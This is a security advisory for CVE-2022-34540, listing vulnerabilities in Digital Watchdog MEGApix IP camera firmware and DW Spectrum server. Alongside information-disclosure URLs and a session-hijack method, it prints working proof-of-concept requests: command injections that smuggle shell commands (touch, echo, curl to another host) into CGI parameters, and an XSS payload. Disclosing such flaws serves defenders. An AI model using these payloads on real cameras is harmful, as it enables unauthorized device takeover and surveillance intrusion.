Headline
CVE-2022-34540: dw_vulns.txt
Digital Watchdog DW MEGApix IP cameras A7.2.2_20211029 was discovered to contain a command injection vulnerability in the component /admin/vca/license/license_tok.cgi. This vulnerability is exploitable via a crafted POST request.
The following issue was found on DW Spectrum server software ver 4.2.0.32842 Information Disclosure: 1. API call displays internal paths, IPs, OS version and architecture. http://<SERVER IP>:7001/api/moduleInformation All issues below were found on A7.2.2_20211029 firmware of MegaPix IP Camera by Digital Watchdog. The following issues were found through unauthenticated URLs: Information Disclosure: 1. Web files display internal paths and scripts, software versions (CWE-201) http://192.168.1.80/plugin_info_list.xml http://192.168.1.80/plugin/plugin_web.conf http://192.168.1.80/plugin/port.conf 2. Information disclosure and session hijacking through core log (CWE-201) Step 1. generate 500 error from authenticated by going to 192.168.1.80/cgi-bin/result?msubmenu=event&action Step 2. get core file by going to 192.168.1.80/cgi-bin/core Step 3. Use session token information from error event to log into admin pages The following issues were found through authenticated URLs: 1. Command injection on curltest.cgi web file http://192.168.1.80/cgi-bin/admin/curltest.cgi -injectable on test[] parameters smtp_addr,smtp_port,sender,receiver,id, and pass POST /cgi-bin/admin/curltest.cgi?smtp HTTP/1.1 Host: 192.168.1.80 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 299 Origin: http://192.168.1.80 Authorization: Digest username="admin", realm="IP Camera", nonce="5fdb55be:74a954dee4e18d4598f921815cfda122", uri="/cgi-bin/admin/curltest.cgi?smtp", response="36f619b490b3f5b6cc381f3c80249f2c", qop=auth, nc=0000007d, cnonce="c0b5e7ad8a3ce8b7" Connection: close Referer: http://192.168.1.80/cgi-bin/admin/setup_main.cgi test%5Benabled%5D=1&test%5Bsmtp_addr%5D=192.168.1.5:444’;touch%20./test.txt;curl%20–url%20’http://192.168.1.5&test%5Bssl_enable%5D=0&test%5Bsmtp_port%5D=444&test%5Bssl_port%5D=465&test%5Bid%5D=a&test%5Bpass%5D=a&test%5Bsender%5D=test&test%5Breceiver%5D=test&test%5Btitle%5D=hi&test%5Bmessage%5D=hi 2. Command injection on adacph.cgi web file (CWE-94) http://192.168.1.80/cgi-bin/admin/vca/bia/addacph.cgi -injectable on event, id, pluginname, name, and evt_id paramaters GET /cgi-bin/admin/vca/bia/addacph.cgi?mod&event=a&id=1&pluginname=;%20echo%20’test’>test.html%20;&name=a&evt_id=a 3. Command injection on license_tok.cgi web file (CWE-94) http://192.168.1.80/cgi-bin/admin/vca/license/license_tok.cgi -injectable on POST guid,license_value, and plugin_info parameters POST /cgi-bin/admin/vca/license/license_tok.cgi?getToken HTTP/1.1 Host: 192.168.1.80 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 96 Origin: http://192.168.1.80 Authorization: Digest username="admin", realm="IP Camera", nonce="5fe1c519:e61374f2ea956e03c278894d036fc0ef", uri="/cgi-bin/admin/curltest.cgi?smtp", response="53219d6b6a8afdffb3fbbfd9a17dcf98", qop=auth, nc=0000068c, cnonce="960aed74a9bd1476" Connection: close Referer: http://192.168.1.80/cgi-bin/admin/setup_main.cgi guid=’555 http://127.0.0.1;%20echo ‘test’>test.html%20;curl -k -d guid=555’&license_value=’fff’ 4. XSS vulnerability in bia_oneshot.cgi web file (CWE-79) http://192.168.1.80/cgi-bin/admin/vca/bia/bia_oneshot.cgi?blob=%3Chtml%3E%3Cscript%3Ealert(%27test%27)%3C/script%3E%3C/html%3E -file contents injection allows persistent XSS through blob parameter